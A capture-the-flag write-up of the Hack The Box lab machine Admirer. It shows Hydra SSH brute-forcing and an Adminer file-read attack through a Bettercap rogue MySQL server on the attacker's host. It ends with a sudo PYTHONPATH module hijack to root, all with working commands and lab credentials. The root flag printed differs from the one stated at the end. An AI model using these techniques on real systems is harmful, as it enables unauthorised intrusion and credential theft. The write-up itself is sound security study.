Admirer is an easy Hack The Box Linux-based machine released on the 2nd
of May 2020 and reachable on the IP address 10.10.10.187.
For whose who don't know it yet, Hack The Box is an online platform where vulnerable machines are deployed in a private network accessible via VPN, and where users need to hack their way into the systems to collect flags as proofs of their success.
User flag
Let's start with an Nmap scan:
$ nmap -A 10.10.10.187
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-17 09:39 EDT
Nmap scan report for 10.10.10.187
Host is up (0.033s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
The Nmap scan detected 3 TCP services:
- vsftpd on port 21
- OpenSSH on port 22
- Apache on port 80
The FTP service doesn't allow anonymous access, otherwise Nmap would have told
us about it (the Nmap script ftp-anon is part of the
"default" group of scripts).
Regarding the website, Nmap extracted one hidden folder from /robots.txt named
admin-dir for which the following comment can be read in the same file:
This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
At this point, I initially tried to fuzz the /admin-dir folder with some
well-known security wordlists, but without any success. Then, I tried with a few
combinations of filenames around the concepts of "contacts" and "credentials",
and the result didn't take long to come. I found the two files the above comment
was referring to: /admin-dir/contacts.txt and /admin-dir/credentials.txt.
The first one contains a list of email addresses with the first name and role of the persons as comments:
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb
##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb
# Amy
Email: a.bialik@admirer.htb
# Leonard
Email: l.galecki@admirer.htb
#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb
# Bernadette
Email: b.rauch@admirer.htb
And the second one some credentials for different services:
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!
With the FTP credentials, I could download these 2 files from vsftpd:
html.tar.gzdump.sql
The SQL backup doesn't contain anything interesting but html.tar.gz reveals
the website structure:
$ tree html
html
├── assets
│ ├── css
│ │ ├── fontawesome-all.min.css
│ │ ├── images
│ │ │ ├── arrow.svg
│ │ │ ├── close.svg
│ │ │ └── spinner.svg
│ │ ├── main.css
│ │ └── noscript.css
│ ├── js
│ │ ├── breakpoints.min.js
│ │ ├── browser.min.js
│ │ ├── jquery.min.js
│ │ ├── jquery.poptrox.min.js
│ │ ├── main.js
│ │ └── util.js
│ ├── sass
│ │ ├── base
│ │ │ ├── _page.scss
│ │ │ ├── _reset.scss
│ │ │ └── _typography.scss
│ │ ├── components
│ │ │ ├── _actions.scss
│ │ │ ├── _button.scss
│ │ │ ├── _form.scss
│ │ │ ├── _icon.scss
│ │ │ ├── _icons.scss
│ │ │ ├── _list.scss
│ │ │ ├── _panel.scss
│ │ │ ├── _poptrox-popup.scss
│ │ │ └── _table.scss
│ │ ├── layout
│ │ │ ├── _footer.scss
│ │ │ ├── _header.scss
│ │ │ ├── _main.scss
│ │ │ └── _wrapper.scss
│ │ ├── libs
│ │ │ ├── _breakpoints.scss
│ │ │ ├── _functions.scss
│ │ │ ├── _mixins.scss
│ │ │ ├── _vars.scss
│ │ │ └── _vendor.scss
│ │ ├── main.scss
│ │ └── noscript.scss
│ └── webfonts
│ ├── fa-brands-400.eot
│ ├── fa-brands-400.svg
│ ├── fa-brands-400.ttf
│ ├── fa-brands-400.woff
│ ├── fa-brands-400.woff2
│ ├── fa-regular-400.eot
│ ├── fa-regular-400.svg
│ ├── fa-regular-400.ttf
│ ├── fa-regular-400.woff
│ ├── fa-regular-400.woff2
│ ├── fa-solid-900.eot
│ ├── fa-solid-900.svg
│ ├── fa-solid-900.ttf
│ ├── fa-solid-900.woff
│ └── fa-solid-900.woff2
├── images
│ ├── fulls
│ │ ├── arch01.jpg
│ │ ├── arch02.jpg
│ │ ├── art01.jpg
│ │ ├── art02.jpg
│ │ ├── eng01.jpg
│ │ ├── eng02.jpg
│ │ ├── mind01.jpg
│ │ ├── mind02.jpg
│ │ ├── mus01.jpg
│ │ ├── mus02.jpg
│ │ ├── nat01.jpg
│ │ └── nat02.jpg
│ └── thumbs
│ ├── thmb_arch01.jpg
│ ├── thmb_arch02.jpg
│ ├── thmb_art01.jpg
│ ├── thmb_art02.jpg
│ ├── thmb_eng01.jpg
│ ├── thmb_eng02.jpg
│ ├── thmb_mind01.jpg
│ ├── thmb_mind02.jpg
│ ├── thmb_mus01.jpg
│ ├── thmb_mus02.jpg
│ ├── thmb_nat01.jpg
│ └── thmb_nat02.jpg
├── index.php
├── robots.txt
├── utility-scripts
│ ├── admin_tasks.php
│ ├── db_admin.php
│ ├── info.php
│ └── phptest.php
└── w4ld0s_s3cr3t_d1r
├── contacts.txt
└── credentials.txt
15 directories, 82 files
The structure of the backup is almost the same as the one of the live website.
Only w4ld0s_s3cr3t_d1r has a different name (admin-dir on the live website).
After inspection, I found a couple of credentials in different files. In
index.php (note the non-escaped double quotes in the password):
$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$dbname = "admirerdb";
In utility-scripts/db_admin.php:
$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";
And in w4ld0s_s3cr3t_d1r/credentials.txt (the same file on the live website
doesn't contain the bank account):
[Bank Account]
waldo.11
Ezy]m27}OREc$
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!
With all these credentials, I made two wordlists. One with the different usernames:
waldo
waldo.11
admin
ftpuser
w.cooper@admirer.htb
p.wise@admirer.htb
r.nayyar@admirer.htb
a.bialik@admirer.htb
l.galecki@admirer.htb
h.helberg@admirer.htb
b.rauch@admirer.htb
w.cooper
p.wise
r.nayyar
a.bialik
l.galecki
h.helberg
b.rauch
And another one with the different passwords:
Wh3r3_1s_w4ld0?
]F7jLHw:*G>UPrTo}~A
]F7jLHw:*G>UPrTo}~A"d6b
Ezy]m27}OREc$
fgJr6q#S\W:$P
%n?4Wz}R$tTF7
w0rdpr3ss01!
Then, I tried to brute-force the SSH service with Hydra:
$ hydra -L usernames.txt -P passwords.txt -t 4 10.10.10.187 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-18 06:22:59
[DATA] max 4 tasks per 1 server, overall 4 tasks, 126 login tries (l:18/p:7), ~32 tries per task
[DATA] attacking ssh://10.10.10.187:22/
[22][ssh] host: 10.10.10.187 login: ftpuser password: %n?4Wz}R$tTF7
[STATUS] 106.00 tries/min, 106 tries in 00:01h, 20 to do in 00:01h, 4 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-18 06:24:11
The FTP credentials worked but the connection is automatically closed before accessing any shell. I also tried the same brute-forcing technique on the FTP service but with no more luck.
I decided to have a closer look at the files in the backup, and I eventually
stumbled upon this comment in utility-scripts/db_admin.php:
// TODO: Finish implementing this or find a better open source alternative
After a quick search on the internet for "phpmyadmin equivalents", I found a tool called "Adminer". Bingo!
The Adminer dashboard is accessible at
http://10.10.10.187/utility-scripts/adminer.php. I tried the different
credentials I had collected so far but nothing worked. Then, I checked the known
vulnerabilities of Adminer v4.6.2 (the version number is indicated on the login
page) and it turned out that there is a way to read arbitrary files on the
remote machine.
The attack takes place in 2 steps:
- Instead of trying to log in the local database of the remote system, an attacker can log in a public RDBMS they own.
- Then, the attacker can execute
LOCAL INFILESQL queries to read arbitrary files on the remote filesystem.
Bettercap has a module to set up a rogue MySQL server to read files from the victim using the technique previously mentioned. To do so, I created a caplet script with the following content:
# Replace with your HTB VPN IP address.
set mysql.server.address 10.10.14.17
set mysql.server.port 3306
# The file you want to read from the remote machine.
set mysql.server.infile ../index.php
mysql.server on
And to start Bettercap:
# bettercap -caplet adminer-mysql.cap
Before going further, make sure to accept incoming connections from the remote
server. If you are on a Linux-based system like myself, add this Netfilter rule
with iptables:
# iptables -I INPUT 1 -s 10.10.10.187 -j ACCEPT
To start the attack, I just needed to ask Adminer to connect to my rogue server via the login form. Since I used a fake MySQL server, I could enter any username, password and database name I wanted. It worked well and I could retrieve the actual MySQL credentials used by the PHP application:
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
And these credentials are the ones of an actual UNIX account!
$ ssh waldo@10.10.10.187
waldo@10.10.10.187's password:
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Wed Apr 29 10:56:59 2020 from 10.10.14.3
waldo@admirer:~$ ls
user.txt
waldo@admirer:~$ cat user.txt
19fd5ec7c90993b3fafd9e778cb221ca
Root flag
After a bit of enumeration, I quickly realised that waldo had the permission
to run /opt/scripts/admin_tasks.sh on behalf of root:
$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh
When running this shell script, the user is prompted to select an admin task to execute:
$ sudo /opt/scripts/admin_tasks.sh
[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option:
After inspection of the source code, the only promising element I found for a
privilege escalation was the call to the Python script /opt/scripts/backup.py
(belonging to root as well):
backup_web()
{
if [ "$EUID" -eq 0 ]
then
echo "Running backup script in the background, it might take a while..."
/opt/scripts/backup.py &
else
echo "Insufficient privileges to perform the selected operation."
fi
}
This backup tool imports the make_archive function from the shutil module to
generate a gztar archive of the /var/www/html folder:
#!/usr/bin/python3
from shutil import make_archive
src = '/var/www/html/'
# old ftp directory, not used anymore
#dst = '/srv/ftp/html'
dst = '/var/backups/html'
make_archive(dst, 'gztar', src)
In Python, the folders where the interpreter looks for the modules you try to
import are listed in the PYTHONPATH environment variable, just
like PATH in a shell. Given that the SETENV option is set in the sudoers
policy module for the execution of /opt/scripts/admin_tasks.sh by waldo, the
value of PYTHONPATH can be overwritten, allowing to inject custom versions of
the imported modules.
It is exactly the strategy I followed. I created another module named shutil
containing my own implementation of make_archive:
def make_archive(x, y, z):
with open('/root/root.txt', 'r') as f:
print(f.readline())
I placed this Python script in /tmp/shutil/__init__.py and then:
$ sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
$ 86875a82845fa2c5f211500a85d78f5c
$
The root flag was cf943b5f4a33dc4b9a438550d232915f.
Wrapping up
It was an easy machine, as expected. It still allowed me to discover the Adminer project and it was also an occasion for me to use the rogue MySQL server of Bettercap.